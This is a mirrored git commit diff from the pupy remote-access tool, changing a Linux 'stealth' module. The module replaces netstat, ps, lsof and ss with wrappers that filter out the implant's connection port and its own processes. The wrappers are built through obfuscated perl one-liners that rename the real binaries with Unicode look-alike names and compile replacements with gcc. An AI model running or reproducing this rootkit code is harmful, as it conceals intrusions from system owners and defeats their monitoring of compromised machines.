mirror of https://github.com/n1nj4sec/pupy.git
Merge branch 'RedSunEmpire-master' into dev
This commit is contained in:
commit
5d72cfaac5
|
@ -1,31 +1,23 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
from pupylib.PupyModule import *
|
from pupylib.PupyModule import *
|
||||||
|
from pupylib.utils.rpyc_utils import redirected_stdio
|
||||||
|
|
||||||
__class_name__="SetStealth"
|
__class_name__="SetStealth"
|
||||||
|
def print_callback(data):
|
||||||
|
sys.stdout.write(data)
|
||||||
|
sys.stdout.flush()
|
||||||
|
|
||||||
@config(cat="manage", compat="unix")
|
@config(compat="linux", cat="manage")
|
||||||
class SetStealth(PupyModule):
|
class SetStealth(PupyModule):
|
||||||
"""Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port.
|
"""Hides the runnin process from netstat, ss, ps, lsof by using modified binaries.
|
||||||
Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
|
Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
|
||||||
|
Demo: https://vimeo.com/157356150"""
|
||||||
********************** /!\ WARNING /!\ **********************
|
dependencies=["linux_stealth"]
|
||||||
* Do NOT run the stealh module more than ONCE on a machine. *
|
|
||||||
* Running it two times will brake the binaries. *
|
|
||||||
*************************************************************
|
|
||||||
NOTE: The pp.py script needs to be running with root privileges in order to run this module."""
|
|
||||||
def init_argparse(self):
|
def init_argparse(self):
|
||||||
self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
|
self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
|
||||||
self.arg_parser.add_argument('port', type=int, help='The port number to which Pupy is connecting to.')
|
self.arg_parser.add_argument('--port', default=None, help='The port number to which Pupy is connecting to.')
|
||||||
|
|
||||||
def is_compatible(self):
|
|
||||||
a,r=super(SetStealth, self).is_compatible()
|
|
||||||
if not a:
|
|
||||||
return False, r
|
|
||||||
if self.client.conn.modules['subprocess'].check_output(r"ls -l `dirname \`which netstat\``/net*tat | wc -l", shell=True).strip() == "2":
|
|
||||||
return False, "It looks like this module has already been run on this machine."
|
|
||||||
return True, ""
|
|
||||||
|
|
||||||
def run(self, args):
|
def run(self, args):
|
||||||
self.client.load_package("linux_stealth")
|
with redirected_stdio(self.client.conn):
|
||||||
self.client.conn.modules['linux_stealth'].run(str(args.port))
|
self.client.conn.modules['linux_stealth'].run(args.port)
|
||||||
self.success("Module executed successfully.")
|
self.success("Module executed successfully.")
|
||||||
|
|
|
@ -1,18 +1,31 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
import os
|
import sys
|
||||||
import subprocess
|
import subprocess
|
||||||
|
import os
|
||||||
import time
|
import time
|
||||||
|
|
||||||
def cmd_exists(cmd):
|
|
||||||
return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
|
|
||||||
|
|
||||||
def run(port):
|
def run(port=None):
|
||||||
|
if port is None:
|
||||||
|
try:
|
||||||
|
import pupy
|
||||||
|
host, port=pupy.get_connect_back_host().split(":")
|
||||||
|
except:
|
||||||
|
raise Exception("pupy connect back port couldn't be found, please precise it manually")
|
||||||
|
|
||||||
|
print "hidding port %s ..."%port
|
||||||
|
|
||||||
|
a=subprocess.check_output(["netstat", "-tn"])
|
||||||
|
if port in a:
|
||||||
|
def cmd_exists(cmd):
|
||||||
|
return subprocess.call("type " + cmd, shell=True,
|
||||||
|
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
|
||||||
if cmd_exists("gcc") == True:
|
if cmd_exists("gcc") == True:
|
||||||
bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
|
bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
|
||||||
#subprocess.call(bash, shell=True)
|
|
||||||
with open('/tmp/b', 'w') as f:
|
with open('/tmp/b', 'w') as f:
|
||||||
f.write(bash)
|
f.write(bash)
|
||||||
|
f.close()
|
||||||
os.system("bash /tmp/b")
|
os.system("bash /tmp/b")
|
||||||
time.sleep(3)
|
time.sleep(3)
|
||||||
os.remove("/tmp/b")
|
os.remove("/tmp/b")
|
||||||
|
@ -20,6 +33,7 @@ def run(port):
|
||||||
bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
|
bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
|
||||||
with open("/tmp/p", "w") as f:
|
with open("/tmp/p", "w") as f:
|
||||||
f.write(bash)
|
f.write(bash)
|
||||||
|
f.close()
|
||||||
os.system("bash /tmp/p")
|
os.system("bash /tmp/p")
|
||||||
time.sleep(3)
|
time.sleep(3)
|
||||||
os.remove("/tmp/p")
|
os.remove("/tmp/p")
|
||||||
|
@ -30,7 +44,7 @@ def run(port):
|
||||||
os.system("mv "+path+"ss "+path+"zss")
|
os.system("mv "+path+"ss "+path+"zss")
|
||||||
with open(path+"ss", "w") as newss:
|
with open(path+"ss", "w") as newss:
|
||||||
newss.write(bashss)
|
newss.write(bashss)
|
||||||
|
newss.close()
|
||||||
os.system("chmod +x "+path+"ss")
|
os.system("chmod +x "+path+"ss")
|
||||||
#blazo - fresh orange
|
else:
|
||||||
#brock - september 22nd
|
print "port is already hidden"
|
||||||
#Creds to: www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
|
|
||||||
|
|
Loading…
Reference in New Issue